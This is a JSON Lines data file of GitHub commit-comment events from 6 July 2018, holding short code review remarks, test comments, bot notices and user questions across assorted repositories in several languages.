{"id":"7927205013","type":"CommitCommentEvent","actor":{"login":"msrsldks"},"repo":{"name":"zhujintao/dingAdsync"},"payload":{"comment":{"id":29617350,"position":13,"line":13,"path":"README.md","commit_id":"c452e21587d109ec5eabb5239a1940814bcc0613","created_at":"2018-07-06T07:04:22Z","updated_at":"2018-07-06T07:04:22Z","author_association":"NONE","body":"12313213123"}},"created_at":"2018-07-06T07:04:22Z"}
{"id":"7927211104","type":"CommitCommentEvent","actor":{"login":"ThomasHuai"},"repo":{"name":"ThomasHuai/puzzle"},"payload":{"comment":{"id":29617360,"position":null,"line":null,"path":null,"commit_id":"1d6cc4653ffbe6ec057ddef72b1582cc6cb4236d","created_at":"2018-07-06T07:05:54Z","updated_at":"2018-07-06T07:05:54Z","author_association":"OWNER","body":"减少生成图片的像素，想要很多的马赛克块组成但是没有足够的图片组成会无法生成"}},"created_at":"2018-07-06T07:05:54Z"}
{"id":"7927211712","type":"CommitCommentEvent","actor":{"login":"JerryTsang"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29617362,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-06T07:06:05Z","updated_at":"2018-07-06T07:06:05Z","author_association":"OWNER","body":"wifi 声音那些都好了？"}},"created_at":"2018-07-06T07:06:05Z"}
{"id":"7927214277","type":"CommitCommentEvent","actor":{"login":"seyijava"},"repo":{"name":"seyijava/DataLake-Architecture-Using-Hadoop-Ecosystem"},"payload":{"comment":{"id":29617364,"position":null,"line":null,"path":null,"commit_id":"30766f2e1833cfc1061fd6013206266996037ffb","created_at":"2018-07-06T07:06:44Z","updated_at":"2018-07-06T07:06:44Z","author_association":"OWNER","body":"gggggg"}},"created_at":"2018-07-06T07:06:44Z"}
{"id":"7927223305","type":"CommitCommentEvent","actor":{"login":"allenu"},"repo":{"name":"allenu/YokosukaJS"},"payload":{"comment":{"id":29617382,"position":49,"line":369,"path":"game.js","commit_id":"19248b4cd26b0274c3b2360688a5d177c2e694b9","created_at":"2018-07-06T07:09:12Z","updated_at":"2018-07-06T07:09:12Z","author_association":"OWNER","body":"This camera implementation was so simple to do using a functional style."}},"created_at":"2018-07-06T07:09:12Z"}
{"id":"7927224038","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29617383,"position":33,"line":129,"path":"index.php","commit_id":"911517aa2ef39fcf67348beaf7ef3cc7644ad688","created_at":"2018-07-06T07:09:24Z","updated_at":"2018-07-06T07:09:24Z","author_association":"NONE","body":"$this->catIds - массив\r\nПри присвоении у тебя будет ошибка"}},"created_at":"2018-07-06T07:09:24Z"}
{"id":"7927228033","type":"CommitCommentEvent","actor":{"login":"EldonL"},"repo":{"name":"EldonL/ENSC482-ImageProcessing"},"payload":{"comment":{"id":29617389,"position":null,"line":null,"path":null,"commit_id":"3a0ad97b42bfce7b56b0318b5a3363f1ec9916c8","created_at":"2018-07-06T07:10:27Z","updated_at":"2018-07-06T07:10:27Z","author_association":"OWNER","body":"Edit: I meant creating new folder for source file"}},"created_at":"2018-07-06T07:10:27Z"}
{"id":"7927228393","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-mlr-feedstock"},"payload":{"comment":{"id":29617390,"position":null,"line":null,"path":null,"commit_id":"6b05c7bab8cbe3555a04dbc17eef26b220c9bb64","created_at":"2018-07-06T07:10:32Z","updated_at":"2018-07-06T07:10:32Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-06T07:10:32Z"}
{"id":"7927230167","type":"CommitCommentEvent","actor":{"login":"mmdnetwork"},"repo":{"name":"mmdnetwork/mmdnetwork.com"},"payload":{"comment":{"id":29617392,"position":null,"line":null,"path":null,"commit_id":"a87440b36c428432ad1b7536ade43264d1c13005","created_at":"2018-07-06T07:11:01Z","updated_at":"2018-07-06T07:11:01Z","author_association":"OWNER","body":"Added domain name availability search function.  Also added a Static Home Page, and adjusted the footer widgets."}},"created_at":"2018-07-06T07:11:01Z"}
{"id":"7927230783","type":"CommitCommentEvent","actor":{"login":"dubeyalok7"},"repo":{"name":"dubeyalok7/crypto-algo"},"payload":{"comment":{"id":29617393,"position":28,"line":28,"path":"RSA_Key/main.c","commit_id":"eee96ccc663af59d955cc784eab11828f8a6f5b9","created_at":"2018-07-06T07:11:11Z","updated_at":"2018-07-06T07:11:11Z","author_association":"OWNER","body":"Not able to print proper values"}},"created_at":"2018-07-06T07:11:11Z"}
{"id":"7927233331","type":"CommitCommentEvent","actor":{"login":"muhdfirdaus"},"repo":{"name":"muhdfirdaus/CCS"},"payload":{"comment":{"id":29617398,"position":64,"line":64,"path":"dist/uploads/Artical_Entry.php","commit_id":"312e79bfc80896eacea3ac37a79c0e58d6bcf7da","created_at":"2018-07-06T07:11:54Z","updated_at":"2018-07-06T07:11:54Z","author_association":"OWNER","body":"aaaaa"}},"created_at":"2018-07-06T07:11:54Z"}
{"id":"7927235564","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29617400,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-06T07:12:30Z","updated_at":"2018-07-06T07:12:30Z","author_association":"NONE","body":"好了\n\nJerryTsang <notifications@github.com> 于 2018年7月6日周五 下午3:06写道：\n\n> wifi 声音那些都好了？\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/JerryTsang/android_kernel_sharp_msm8974/commit/c2ba89c6b256cc21ae077888e3248121a5789cb3#commitcomment-29617362>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AOQwEizAoj36u8kzTLLfJ92PJqlMJe1Uks5uDwxdgaJpZM4VDPyB>\n> .\n>\n"}},"created_at":"2018-07-06T07:12:30Z"}
{"id":"7927237187","type":"CommitCommentEvent","actor":{"login":"VicerExciser"},"repo":{"name":"zedmands/EventsNearYou"},"payload":{"comment":{"id":29617407,"position":null,"line":null,"path":null,"commit_id":"c4f24183e65db7df83fb4937f5bc0510bcebe4ab","created_at":"2018-07-06T07:12:56Z","updated_at":"2018-07-06T07:12:56Z","author_association":"COLLABORATOR","body":"Great eye spotting that China bug, Zach!"}},"created_at":"2018-07-06T07:12:56Z"}
{"id":"7927238112","type":"CommitCommentEvent","actor":{"login":"gmerlino"},"repo":{"name":"gmerlino/homebrew-exfat"},"payload":{"comment":{"id":29617410,"position":null,"line":null,"path":null,"commit_id":"424ac96d9649d4c427870b88d0607449102a5916","created_at":"2018-07-06T07:13:11Z","updated_at":"2018-07-06T07:13:11Z","author_association":"OWNER","body":"solves issue #1 "}},"created_at":"2018-07-06T07:13:11Z"}
{"id":"7927239220","type":"CommitCommentEvent","actor":{"login":"canwaykalburim"},"repo":{"name":"canwaykalburim/School_Life"},"payload":{"comment":{"id":29617411,"position":null,"line":null,"path":null,"commit_id":"d449cbc8c9709901b7de39933ace221dc7f4fa9c","created_at":"2018-07-06T07:13:28Z","updated_at":"2018-07-06T07:13:28Z","author_association":"OWNER","body":"vending machine"}},"created_at":"2018-07-06T07:13:28Z"}
{"id":"7927239318","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"airbnb/react-dates"},"payload":{"comment":{"id":29617412,"position":null,"line":null,"path":null,"commit_id":"453face2df9ac8542f30e2a6afc92d8ee6f54801","created_at":"2018-07-06T07:13:30Z","updated_at":"2018-07-06T07:13:30Z","author_association":"MEMBER","body":"@dicer3 then please file an issue."}},"created_at":"2018-07-06T07:13:30Z"}
{"id":"7927241132","type":"CommitCommentEvent","actor":{"login":"gyq1534574992"},"repo":{"name":"gyq1534574992/algorithm"},"payload":{"comment":{"id":29617416,"position":null,"line":null,"path":null,"commit_id":"d79dbdf006edca22f395f0604084db8b8a6c03b3","created_at":"2018-07-06T07:14:00Z","updated_at":"2018-07-06T07:14:00Z","author_association":"OWNER","body":"递归"}},"created_at":"2018-07-06T07:14:00Z"}
{"id":"7927241801","type":"CommitCommentEvent","actor":{"login":"amtlib-dot-dll"},"repo":{"name":"LineageOS/lineage_wiki"},"payload":{"comment":{"id":29617419,"position":6,"line":14,"path":"_data/devices/lithium.yml","commit_id":"c900944519705fde7744ad88b274c8ff043860ca","created_at":"2018-07-06T07:14:11Z","updated_at":"2018-07-06T07:14:11Z","author_association":"NONE","body":"Sorry but is there any source code information for this custom build of TWRP, that is, how to manually build this recovery by ourselves? Thank you very much @blunden "}},"created_at":"2018-07-06T07:14:11Z"}
{"id":"7927244254","type":"CommitCommentEvent","actor":{"login":"sualko"},"repo":{"name":"jsxc/jsxc"},"payload":{"comment":{"id":29617423,"position":15,"line":1367,"path":"src/jsxc.lib.muc.js","commit_id":"abcf3e6027099c3c8d1304de09b112ded606f16a","created_at":"2018-07-06T07:14:51Z","updated_at":"2018-07-06T07:14:51Z","author_association":"MEMBER","body":"Only in v4"}},"created_at":"2018-07-06T07:14:51Z"}
{"id":"7927244775","type":"CommitCommentEvent","actor":{"login":"wusmile"},"repo":{"name":"desktop/desktop"},"payload":{"comment":{"id":29617425,"position":38,"line":49,"path":"app/src/ui/diff/image-diffs/two-up.tsx","commit_id":"90407c2590f29b435e80367578e235d1c5274cc9","created_at":"2018-07-06T07:15:00Z","updated_at":"2018-07-06T07:15:00Z","author_association":"NONE","body":"<div calss=\"box\"></div>"}},"created_at":"2018-07-06T07:15:00Z"}
{"id":"7927245379","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29617427,"position":null,"line":null,"path":null,"commit_id":"0a121190bb2cb6c51dfbbddd6a8155f3901eec29","created_at":"2018-07-06T07:15:11Z","updated_at":"2018-07-06T07:15:11Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 32](https://teamcity.otenv.com/viewLog.html?buildId=8875356&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **SUCCESS**\nSummary: Tests passed: 24 Build time: 00:13:18"}},"created_at":"2018-07-06T07:15:11Z"}
{"id":"7927249992","type":"CommitCommentEvent","actor":{"login":"kasiawasiuta"},"repo":{"name":"dsciebux/pmdk-tests"},"payload":{"comment":{"id":29617436,"position":704,"line":704,"path":"src/tests/pmemobj/obj_ctl/pool_extend/pool_extend_tests.cc","commit_id":"082a1c3aa6e2a48b0adbd96f75b5615e0581f05a","created_at":"2018-07-06T07:16:25Z","updated_at":"2018-07-06T07:16:25Z","author_association":"NONE","body":"Could you please fix the parenthesis (move to the upper line)?"}},"created_at":"2018-07-06T07:16:25Z"}
{"id":"7927252983","type":"CommitCommentEvent","actor":{"login":"anitaSpatil"},"repo":{"name":"tinyos/tinyos-main"},"payload":{"comment":{"id":29617438,"position":7,"line":5,"path":"README.md","commit_id":"ad056121cc51c449d6de154d98604e2c167dbfd8","created_at":"2018-07-06T07:17:12Z","updated_at":"2018-07-06T07:17:12Z","author_association":"NONE","body":"earlier around a year back I installed TinyOS-2.1.2 along with Eclipse and supporting Yeti 2 plugins, But now I am not getting Yeti 2 as well ashttp: //tinyos.net website. As I can see now there is a new version 3, Please guide me how to install the complete TinyOS on Ubuntu 18.04 LTS.\r\n\r\nThanking you\r\nAnita S Patil"}},"created_at":"2018-07-06T07:17:12Z"}
{"id":"7927254818","type":"CommitCommentEvent","actor":{"login":"itblaked"},"repo":{"name":"elastic/ansible-elasticsearch"},"payload":{"comment":{"id":29617442,"position":null,"line":null,"path":null,"commit_id":"cc28b6149af9866455f9b1b90ac601596e4635a4","created_at":"2018-07-06T07:17:42Z","updated_at":"2018-07-06T07:17:42Z","author_association":"NONE","body":"Hi, I saw this SSL config got pulled out, what was the reason and what's the plan for SSL? I'm using some of this at the moment as have a platinum licensed and needed the SSL config so wondering if it was coming back."}},"created_at":"2018-07-06T07:17:42Z"}
{"id":"7927258817","type":"CommitCommentEvent","actor":{"login":"gctucker"},"repo":{"name":"ana/lava-ci-staging"},"payload":{"comment":{"id":29617446,"position":5,"line":19,"path":"templates/usb/usb.jinja2","commit_id":"00ebc55093795a6cf1dfee7a2c518719b10cdd88","created_at":"2018-07-06T07:18:48Z","updated_at":"2018-07-06T07:18:48Z","author_association":"NONE","body":"@tomeuv Do we need to try this 10 times for the USB resume test case?"}},"created_at":"2018-07-06T07:18:48Z"}
{"id":"7927259986","type":"CommitCommentEvent","actor":{"login":"anitaSpatil"},"repo":{"name":"tinyos/tinyos-main"},"payload":{"comment":{"id":29617449,"position":null,"line":null,"path":null,"commit_id":"ad056121cc51c449d6de154d98604e2c167dbfd8","created_at":"2018-07-06T07:19:08Z","updated_at":"2018-07-06T07:19:08Z","author_association":"NONE","body":"\r\nDear Sir,\r\nEarlier around a year back I installed TinyOS-2.1.2 along with Eclipse and supporting Yeti 2 plugins, But now I am not getting Yeti 2 as well ashttp: //tinyos.net website. As I can see now there is a new version 3, Please guide me how to install the complete TinyOS on Ubuntu 18.04 LTS.\r\n\r\nThanking you\r\nAnita S Patil\r\n"}},"created_at":"2018-07-06T07:19:08Z"}
{"id":"7927260018","type":"CommitCommentEvent","actor":{"login":"tkachpavlo1"},"repo":{"name":"maksGunner/test1"},"payload":{"comment":{"id":29617450,"position":null,"line":null,"path":null,"commit_id":"bca2618f3a2e1c1e83543dc12ae33fbcfe4a2b43","created_at":"2018-07-06T07:19:09Z","updated_at":"2018-07-06T07:19:09Z","author_association":"NONE","body":"xx"}},"created_at":"2018-07-06T07:19:09Z"}
{"id":"7927262416","type":"CommitCommentEvent","actor":{"login":"adr-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29617461,"position":null,"line":null,"path":null,"commit_id":"adde682f232fd70d87548f352a37eab1bc803bb7","created_at":"2018-07-06T07:19:46Z","updated_at":"2018-07-06T07:19:46Z","author_association":"NONE","body":"[IMP] web: implement normalize domain utility function\r\n\r\nIn this commit, we implement a function which normalize a domain represented as a py.js syntax tree."}},"created_at":"2018-07-06T07:19:46Z"}
{"id":"7927264391","type":"CommitCommentEvent","actor":{"login":"egede"},"repo":{"name":"apsknight/ganga"},"payload":{"comment":{"id":29617464,"position":17,"line":951,"path":"ganga/GangaCore/Core/MonitoringComponent/Local_GangaMC_Service.py","commit_id":"e0b42ee363f8ef70a20d7f9d8ea1465cb6cea923","created_at":"2018-07-06T07:20:17Z","updated_at":"2018-07-06T07:20:17Z","author_association":"NONE","body":"So if you see a job is in a \"new\" state, you will update their status from disk. If this status is changed, you will need to reload the complete job (as it could have changed)."}},"created_at":"2018-07-06T07:20:17Z"}
{"id":"7927264498","type":"CommitCommentEvent","actor":{"login":"bozeak"},"repo":{"name":"easySuite/ding_language"},"payload":{"comment":{"id":29617465,"position":7,"line":7,"path":"ding_language.install","commit_id":"7ac7f03bdbf621a3388e6829a6c6401022600693","created_at":"2018-07-06T07:20:19Z","updated_at":"2018-07-06T07:20:19Z","author_association":"CONTRIBUTOR","body":"^^"}},"created_at":"2018-07-06T07:20:19Z"}
{"id":"7927266880","type":"CommitCommentEvent","actor":{"login":"lkreimann"},"repo":{"name":"plentymarkets/plugin-ceres"},"payload":{"comment":{"id":29617470,"position":null,"line":null,"path":null,"commit_id":"4b582efd69a126cafa099a2d68b986d857934936","created_at":"2018-07-06T07:20:55Z","updated_at":"2018-07-06T07:20:55Z","author_association":"NONE","body":"Ich glaub beim Mergen ist was mit der `OrderDetails.twig` schief gelaufen - der Part nach `{% set grossNet = LayoutContainer.show(\"Ceres::OrderConfirmation.GrossNetReplace\", orderData.order) %}` kommt doppelt vor, das ist vermutlich nicht so beabsichtigt. Vgl. vor allem mit dem vorhergehenden Commit, der diese Lines verändert: https://github.com/plentymarkets/plugin-ceres/commit/ecefde1ac361d018b4d886d558b8b51729e3acc1#diff-b71a6feed738cf93712cc1a55102b6d6\r\n\r\nOder sehe ich da was falsch? "}},"created_at":"2018-07-06T07:20:55Z"}
{"id":"7927268888","type":"CommitCommentEvent","actor":{"login":"maksGunner"},"repo":{"name":"tkachpavlo1/test1"},"payload":{"comment":{"id":29617475,"position":null,"line":null,"path":null,"commit_id":"4fedd20078b4ac4db8e785375d8ed8041b0bd041","created_at":"2018-07-06T07:21:25Z","updated_at":"2018-07-06T07:21:25Z","author_association":"NONE","body":"yes"}},"created_at":"2018-07-06T07:21:25Z"}
{"id":"7927270469","type":"CommitCommentEvent","actor":{"login":"rohmanhm"},"repo":{"name":"benawad/fullstack-graphql-airbnb-clone"},"payload":{"comment":{"id":29617479,"position":19,"line":26,"path":"packages/controller/package.json","commit_id":"5b1b90852f9c4ed996f580ff684050c2ba835afb","created_at":"2018-07-06T07:21:49Z","updated_at":"2018-07-06T07:21:49Z","author_association":"NONE","body":"I think you forget to remove `apollo-codegen` from dependencies. Or it's still needed?"}},"created_at":"2018-07-06T07:21:49Z"}
{"id":"7927270537","type":"CommitCommentEvent","actor":{"login":"yonjah"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29617480,"position":7,"line":15,"path":"server/routes/users.js","commit_id":"d2e3e8b926b2ec7b11d928489bba1b4d4d40f96d","created_at":"2018-07-06T07:21:50Z","updated_at":"2018-07-06T07:21:50Z","author_association":"NONE","body":"I think this will cause usability issues.\r\nIf e-mail is invalid you want the user to know it's invalid to check it.\r\nunlike the case where the e-mail is valid but no user actually exist that you don't want to leak any information out.\r\n\r\nAlso fro logging perspective there is a big difference from user made a typo in his email to user tried injecting an object in his password\r\n\r\nI would throw different errors here for each check "}},"created_at":"2018-07-06T07:21:50Z"}
{"id":"7927274772","type":"CommitCommentEvent","actor":{"login":"gctucker"},"repo":{"name":"ana/lava-ci-staging"},"payload":{"comment":{"id":29617492,"position":8,"line":22,"path":"templates/usb/usb.jinja2","commit_id":"00ebc55093795a6cf1dfee7a2c518719b10cdd88","created_at":"2018-07-06T07:22:54Z","updated_at":"2018-07-06T07:22:54Z","author_association":"NONE","body":"@ana @tomeuv I think it's worth having a test in between the 2 types of suspend, so if a USB device disappears we know which suspend mode caused it.  So maybe we need 2 test cases: `compare-freeze` and `compare-mem`."}},"created_at":"2018-07-06T07:22:54Z"}
{"id":"7927275378","type":"CommitCommentEvent","actor":{"login":"rishii2129"},"repo":{"name":"rishii2129/minikube"},"payload":{"comment":{"id":29617494,"position":1,"line":293,"path":"README.md","commit_id":"88e3d13509edca7a8e4c04dafbb4cce60a6a382b","created_at":"2018-07-06T07:23:03Z","updated_at":"2018-07-06T07:23:03Z","author_association":"OWNER","body":"How are you?"}},"created_at":"2018-07-06T07:23:03Z"}
{"id":"7927278091","type":"CommitCommentEvent","actor":{"login":"adr-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29617500,"position":null,"line":null,"path":null,"commit_id":"3cb6bac6d9f2e4e2bdef0aa97a5ac44a6e7d141e","created_at":"2018-07-06T07:23:45Z","updated_at":"2018-07-06T07:23:45Z","author_association":"NONE","body":"[IMP] web: implement assemble domain utility function\r\n\r\nIn this commit, we implement a function which allow to combine a list of domains into a single normalized\r\nusing a 'OR' or an 'AND' operator. We also refactor slightly py_utils."}},"created_at":"2018-07-06T07:23:45Z"}
{"id":"7927278403","type":"CommitCommentEvent","actor":{"login":"CizChenzhoU"},"repo":{"name":"ThomasHuai/puzzle"},"payload":{"comment":{"id":29617501,"position":null,"line":null,"path":null,"commit_id":"1d6cc4653ffbe6ec057ddef72b1582cc6cb4236d","created_at":"2018-07-06T07:23:50Z","updated_at":"2018-07-06T07:23:50Z","author_association":"NONE","body":"像素已经很小了，这种调试到极限也没有成功一次\r\n----------------------------\r\nSLICE_SIZE = 85\r\nOUT_SIZE = 120\r\nIN_DIR = \"database/full/\"\r\nOUT_DIR = \"output/\"\r\nFAR = 1000\r\nREPATE = 1000\r\n------------------------------\r\n\r\n[#################################################################]100%Traceback (most recent call last):\r\n  File \"puzzle.py\", line 181, in <module>\r\n    out = make_puzzle(img, list_of_imgs)\r\n  File \"puzzle.py\", line 82, in make_puzzle\r\n    close_img_name = find_closiest(color, color_list)\r\n  File \"puzzle.py\", line 64, in find_closiest\r\n    raise ValueError(\"没有足够的近似图片，建议设置重复\")\r\nValueError: 没有足够的近似图片，建议设置重复\r\n"}},"created_at":"2018-07-06T07:23:50Z"}
{"id":"7927279195","type":"CommitCommentEvent","actor":{"login":"Tanisun"},"repo":{"name":"Tanisun/SanDeGo"},"payload":{"comment":{"id":29617502,"position":9,"line":9,"path":"Wiki/Correctionsuggestion","commit_id":"e268c273d950da9a4da857b3bf2a9f9c4d000bf3","created_at":"2018-07-06T07:24:02Z","updated_at":"2018-07-06T07:24:02Z","author_association":"OWNER","body":"<li>送金時には一律で「0.001 SDGO」の手数料が発生します</li>"}},"created_at":"2018-07-06T07:24:02Z"}
{"id":"7927297794","type":"CommitCommentEvent","actor":{"login":"Liugq5713"},"repo":{"name":"Amoxi1/test"},"payload":{"comment":{"id":29617528,"position":2,"line":2,"path":"todo.js","commit_id":"0282c4dc6c97405b51d012ce0350df226cc9cc5b","created_at":"2018-07-06T07:28:35Z","updated_at":"2018-07-06T07:28:35Z","author_association":"NONE","body":"getElementById  这种方式，不能说不好，但是 document.querySelector( )，更灵活， 了解一下啊"}},"created_at":"2018-07-06T07:28:35Z"}
{"id":"7927299759","type":"CommitCommentEvent","actor":{"login":"Liugq5713"},"repo":{"name":"Amoxi1/test"},"payload":{"comment":{"id":29617531,"position":36,"line":36,"path":"todo.js","commit_id":"0282c4dc6c97405b51d012ce0350df226cc9cc5b","created_at":"2018-07-06T07:29:04Z","updated_at":"2018-07-06T07:29:04Z","author_association":"NONE","body":"麻烦用你的聪明才智，将变量名修改一下"}},"created_at":"2018-07-06T07:29:04Z"}
{"id":"7927300529","type":"CommitCommentEvent","actor":{"login":"Liugq5713"},"repo":{"name":"Amoxi1/test"},"payload":{"comment":{"id":29617535,"position":48,"line":48,"path":"todo.js","commit_id":"0282c4dc6c97405b51d012ce0350df226cc9cc5b","created_at":"2018-07-06T07:29:14Z","updated_at":"2018-07-06T07:29:14Z","author_association":"NONE","body":"这里也是"}},"created_at":"2018-07-06T07:29:14Z"}
{"id":"7927301181","type":"CommitCommentEvent","actor":{"login":"LisaLandes"},"repo":{"name":"Deutsche-Digitale-Bibliothek/ddblabs-ddbtools-statistic"},"payload":{"comment":{"id":29617537,"position":null,"line":null,"path":null,"commit_id":"48320530c4527b49e47c553b878d0fe00fc4e138","created_at":"2018-07-06T07:29:23Z","updated_at":"2018-07-06T07:29:23Z","author_association":"NONE","body":"2 Änderungen: \r\n- Ein Objekt, das direkt digiCULT zugeordnet war, wurde gelöscht (vom FIZ selber? Wer hat das veranlasst)\r\n- Bei der Bundesanstalt für Wasserbau wurde über dash in -p der erste Echtdaten-Ingest in die neue Produktion übernommen und 12.599 Objekte aus der Direktmigration ersetzt (es gibt allerdings noch ein Datenpaket der BAW mit 6 Objekten aus der Direktmigration, das noch nicht ersetzt wurde)."}},"created_at":"2018-07-06T07:29:23Z"}
{"id":"7927303047","type":"CommitCommentEvent","actor":{"login":"sriadiga"},"repo":{"name":"krishna-waidande/ImportParticipantCsv_plugin"},"payload":{"comment":{"id":29617540,"position":45,"line":36,"path":"src/main/java/com/krishagni/participantcsv/core/ParticipantCsvImporter.java","commit_id":"8af478a254e9aa3a5d38276f012d92f83b64f830","created_at":"2018-07-06T07:29:49Z","updated_at":"2018-07-06T07:29:49Z","author_association":"NONE","body":"Is the correct way to handle exceptions?\r\n\r\nWhat kind of code review is SI doing?"}},"created_at":"2018-07-06T07:29:49Z"}
{"id":"7927303063","type":"CommitCommentEvent","actor":{"login":"zhenzb"},"repo":{"name":"zhenzb/zzb"},"payload":{"comment":{"id":29617541,"position":null,"line":null,"path":null,"commit_id":"ebf0549cf40b64b25831dcefd9829bd865885e58","created_at":"2018-07-06T07:29:49Z","updated_at":"2018-07-06T07:29:49Z","author_association":"OWNER","body":"ww"}},"created_at":"2018-07-06T07:29:49Z"}
{"id":"7927303737","type":"CommitCommentEvent","actor":{"login":"matthewoliver"},"repo":{"name":"rhafer/crowbar-openstack"},"payload":{"comment":{"id":29617543,"position":38,"line":38,"path":"chef/cookbooks/crowbar-openstack/recipes/pg2mariadb_preparation.rb","commit_id":"a798efac834e33e1309fe966d2039b8c6e3016fb","created_at":"2018-07-06T07:29:59Z","updated_at":"2018-07-06T07:29:59Z","author_association":"NONE","body":"Yup, as far as I can see, the django db (horizon) is just session and django related stuff, so probably safe to simply replace. "}},"created_at":"2018-07-06T07:29:59Z"}
{"id":"7927309852","type":"CommitCommentEvent","actor":{"login":"Liugq5713"},"repo":{"name":"Amoxi1/test"},"payload":{"comment":{"id":29617561,"position":9,"line":9,"path":"todo.js","commit_id":"0282c4dc6c97405b51d012ce0350df226cc9cc5b","created_at":"2018-07-06T07:31:29Z","updated_at":"2018-07-06T07:31:29Z","author_association":"NONE","body":"函数的命名，请遵循小驼峰法（http://www.cnblogs.com/polk6/p/4660195.html#Menu3-FrameDev）"}},"created_at":"2018-07-06T07:31:29Z"}
{"id":"7927311991","type":"CommitCommentEvent","actor":{"login":"wooriapt79"},"repo":{"name":"wooriapt/wooriapt.github.io"},"payload":{"comment":{"id":29617565,"position":2,"line":195,"path":"_posts/2018-07-06-ICO Community Management.md","commit_id":"d4dbabeb7559506066a821be276077cc7bf9b843","created_at":"2018-07-06T07:32:02Z","updated_at":"2018-07-06T07:32:02Z","author_association":"NONE","body":"적용이 안되는 데..이유가 뭐지"}},"created_at":"2018-07-06T07:32:02Z"}
{"id":"7927313087","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"Ad1n/Black_Jack"},"payload":{"comment":{"id":29617568,"position":27,"line":27,"path":".idea/workspace.xml","commit_id":"3f40ea5009232584d38c567c4c372ad824202bfa","created_at":"2018-07-06T07:32:17Z","updated_at":"2018-07-06T07:32:17Z","author_association":"NONE","body":"настройки редактора это индивидуальная вещь, поэтому лучше в папке проекта создать файл .gitignore\r\nи в нему указать папку .idea"}},"created_at":"2018-07-06T07:32:17Z"}
{"id":"7927315312","type":"CommitCommentEvent","actor":{"login":"zola-octanoviar"},"repo":{"name":"zola-octanoviar/api-chatbot"},"payload":{"comment":{"id":29617575,"position":null,"line":null,"path":null,"commit_id":"5e391d66f52147357e477ae9a9f83aadeeb1f5b3","created_at":"2018-07-06T07:32:50Z","updated_at":"2018-07-06T07:32:50Z","author_association":"OWNER","body":"Tolong \r\n \t\t//test\r\n+\t\t//test 1\r\n\r\nremove "}},"created_at":"2018-07-06T07:32:50Z"}
{"id":"7927316170","type":"CommitCommentEvent","actor":{"login":"ekhanunimelb"},"repo":{"name":"UoM-ResPlat-DevOps/uom-cloud-dashboard"},"payload":{"comment":{"id":29617577,"position":null,"line":null,"path":null,"commit_id":"7b3a10132ec9c25996e4f3c78731f740aba6420c","created_at":"2018-07-06T07:33:04Z","updated_at":"2018-07-06T07:33:04Z","author_association":"COLLABORATOR","body":"http://www.django-rest-framework.org/topics/release-notes/#370\r\n\r\nhttps://github.com/encode/django-rest-framework/pull/5481"}},"created_at":"2018-07-06T07:33:04Z"}
{"id":"7927316554","type":"CommitCommentEvent","actor":{"login":"zola-octanoviar"},"repo":{"name":"zola-octanoviar/api-chatbot"},"payload":{"comment":{"id":29617578,"position":4,"line":10,"path":"application/controllers/Account.php","commit_id":"5e391d66f52147357e477ae9a9f83aadeeb1f5b3","created_at":"2018-07-06T07:33:09Z","updated_at":"2018-07-06T07:33:09Z","author_association":"OWNER","body":"remove comment"}},"created_at":"2018-07-06T07:33:09Z"}
{"id":"7927319282","type":"CommitCommentEvent","actor":{"login":"ElCuboNegro"},"repo":{"name":"animaltechnologies/animaltechnologies.github.io"},"payload":{"comment":{"id":29617587,"position":null,"line":null,"path":null,"commit_id":"85cbc29e33d02af27b2df1c74572a9871186fdf3","created_at":"2018-07-06T07:33:50Z","updated_at":"2018-07-06T07:33:50Z","author_association":"COLLABORATOR","body":"it's better."}},"created_at":"2018-07-06T07:33:50Z"}
{"id":"7927327858","type":"CommitCommentEvent","actor":{"login":"zhxjgithub"},"repo":{"name":"zhxjgithub/hello-world"},"payload":{"comment":{"id":29617603,"position":null,"line":null,"path":null,"commit_id":"2db33069d2329a2a0f3cdb9669ef5666c8610369","created_at":"2018-07-06T07:35:51Z","updated_at":"2018-07-06T07:35:51Z","author_association":"OWNER","body":"s"}},"created_at":"2018-07-06T07:35:51Z"}
{"id":"7927328169","type":"CommitCommentEvent","actor":{"login":"bozeak"},"repo":{"name":"easySuite/ding_language"},"payload":{"comment":{"id":29617604,"position":15,"line":15,"path":"ding_language.module","commit_id":"7ac7f03bdbf621a3388e6829a6c6401022600693","created_at":"2018-07-06T07:35:55Z","updated_at":"2018-07-06T07:35:55Z","author_association":"CONTRIBUTOR","body":"This code is not applicable for all views (Administration views, Workbench related, DAMS related, SearchAPI related). Do you see any other views which should be added here?"}},"created_at":"2018-07-06T07:35:55Z"}
